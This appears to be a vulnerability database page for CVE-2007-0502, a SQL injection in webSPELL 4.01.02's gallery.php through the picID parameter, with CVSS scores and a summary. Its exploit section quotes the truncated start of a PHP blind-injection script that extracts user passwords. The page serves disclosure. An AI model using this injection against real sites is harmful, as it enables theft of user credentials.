7.5
CVSSv2

CVE-2007-0502

Published: 25/01/2007 Updated: 19/10/2017
CVSS v2 Base Score: 7.5 | Impact Score: 6.4 | Exploitability Score: 10
VMScore: 755
Vector: AV:N/AC:L/Au:N/C:P/I:P/A:P

Vulnerability Summary

SQL injection vulnerability in gallery.php in webSPELL 4.01.02 allows remote malicious users to execute arbitrary SQL commands via the picID parameter, a different vector than CVE-2007-0492.

Vulnerable Product Search on Vulmon Subscribe to Product

webspell webspell 4.01.02

Exploits

<?php //webSPELL SQL-injection exploit in galleryphp $xpl = new phpsploit(); $xpl->allowredirection(1); $xpl->cookiejar(1); function istrue($xpl,$host,$path,$prefix,$gid,$pid,$uid,$i,$h){ $xpl->get(""$host$path"galleryphp?action=window&galleryID="$gid"&picID="$pid"%20AND%20MID((SELECT%20password%20FROM%20"$pr ...